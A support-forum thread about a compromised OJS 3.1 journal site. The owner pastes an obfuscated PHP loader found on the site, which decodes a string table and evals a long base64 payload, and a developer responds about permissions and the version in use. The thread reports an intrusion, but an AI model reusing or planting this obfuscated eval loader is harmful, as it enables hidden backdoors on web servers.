Vulnerability in OJS 3.1

johnostrowick · September 17, 2019, 7:37am

The software is vulnerable to a hack. I found this chinese store in my site. Not sure how that is possible.

$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%66

37%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O

00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O0

0O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($

O00O0O("JE8wTzAwMD0iaFh6QWZVcWpSZXBHZ01aV3hibVFJZEpFaW5IeXJCdVZZRHZzS1NUTGFORkNsY3RvT2tQd0ZPeGVaa1loQXlwYXpxU0JMSW9EY05R

R0hqVmd0SkVDbXJNVWxXZlBLZFJYbndpdmJUdXN1cjlzS1ZlenJEdmRYSEFzbU9keE4yOWdTWGU5Y2ExVGRXRmVRUjlWQUNBSVEzSlRRMTBwYnMwbEtCbXZR

VkpGdzNkM0kzUVRjcjA5Y1h3M1NCRzBxZkRMZG9xM3FvazRkYW00ZGhrNW1mejJtZnEzbWhxc214dzNkZ3dweXMwbGNYZXpjWEFGU2FBWm0yOUVOYUNFTlhl

OWNHZVRPME5SQ1JVaklCUnNJb1JpU1dOTmJzMGxjWGV6Y1hBRm0zQXBJMjR6dVdKZVFSOVZBQ0FJUTJSaE5hbk1JSE5OYnMwbFhXQVRJMjFGS0I0enVXSmVR

UjlWQUNBSVEyQU1JQlJwSUhOTmJzMGxYQm5vbFhBVEkyMUZLQjRweXMwbFhEVFRLYTl4TlhlOWNYQVRJMjFGS0I0N3JEdlFaQkNVdzJDN3JEdlFYV0F2STNk

MGNyMHpRUjlmQUNRQkFDUUlRMEZrQ1JKWldHOWZDWE5OYnMwbFhPMHpyRHZ6Y1hlelBnOFRLYTl4TlhlOWNYQVprMENXQ1RDV0JnTmNDUkFETzBGdWsxRGpP

ZlVkWEhlemNYZVR3YVIwS1hlOWNhQXB3bzVGSUJrdk8xOWFXa0xSTzE4cGJzMGxjWGV6Y2Fub2xYQUZtM0FwSTI0OXVXTnNLQjVqUWduN3JEdnpjWGV6Y1hl

emNYOE1LVkEwd1ZxNlBnOTNOM3dFUzI5TVMyTG5Qb2RNSVc5c0tCNWp1M2RwTmFDaW1PZTlLVkEwd1ZxNlBnOW55YVJpd2FMblBvZE1JVzl4S09BbklCUnNQ

akZpSWUwbGNYZXpjWGV6Y1hKcFNIRnhOVlF4TlZjdlFhUlRTUjloSTI1MFNCNTBQWHdFeWExVVFnVHB5czBsY1hlemNYZXpjWGV6Y1hlemNYZXpjYW5vbGFu

eE8yRjBOVkp4bFhUcHlzMGxjWGV6Y1hlemNYZXpjWGV6Y1hlemNYZXpjWGVUU2FSMG1DOUVTT3d6dVdlaktWQTB3VnE2UGc5M04zd0VTMjlNUzJMblBvZE1J

VzlzS0I1anUzZHBOYUNpbU9lOVFnNGpLVkEwd1ZxNlBnOGpQSEF2STNkMFBId01RZzRUbUJBVE8yZE1JakFuSWpEN3JEdnpjWGV6Y1hlemNYZXpjWGV6Y1hl

elpCQ1V3MkM3ckR2emNYZXpjWGV6Y1hlemNYZXpjWGV6Y1hlemNYQVRtT0FGTzI1bk5nZTljWE52TlZBc3d4dk1QM04zTmc1akkyOWpJYWtFbTI5aVAzSnBJ

b3cvdzJuMFNCMUZ3cjBqUEhOdk5WQXNiSDhNUWc0VEthOXhOWDRqUGd3RVFhUlRTUjloSTI1MFNCNTBiczBsY1hlemNYZXpjWGV6Y1hlemNYZXpjVjBkWEhl

emNYZXpjWGV6Y1hlemNYZXpjWGVNUDFkcE5hQ2ltT2U2Y2FGME5WZTZQZzkzTjN3RVMzQ1RtQjVqdzJDdm1PREVtMjlpUDIxRndhbkVTYUM0UGpGaUllMGxj

WGV6Y1hlemNYZXpjWGV6Y1hlemNhbm9sVmQwd29ueE5WY3ZTb25VU0M5alNPQVptMjlFTmFDRU5WcXZjWEFUbU9BRk8yNW5OZ1RVUTJOTUkyTlVTV3dwbE9V

ZFhIZXpjWGV6Y1hlemNYZXpjWGV6Y1hlemNYZXpTQmR2SWdlanVhUWd1bzl0dWFRZ3VIdzdyRHZ6Y1hlemNYZXp

asmecher · September 17, 2019, 3:12pm

Can you provide more information? Where did you find this, what version of OJS are you using, etc?

Thanks,
Alec Smecher
Public Knowledge Project Team

johnostrowick · September 18, 2019, 7:44pm

Hi. Thanks, 3.1.01.
I’ve done:

chmod 755 index.php

and for /var/www/ojs… as well. (Non recursive)

and

chown root:root index.php

asmecher · September 18, 2019, 9:58pm

This isn’t a problem you can fix by setting file permissions. However, see How should file permissions be set? - #2 by ctgraham for a relevant FAQ entry. See also this comment on your other post: [OJS 3.1.0.1] Error in php log customBlockManager - #24 by asmecher

Regards,
Alec Smecher
Public Knowledge Project Team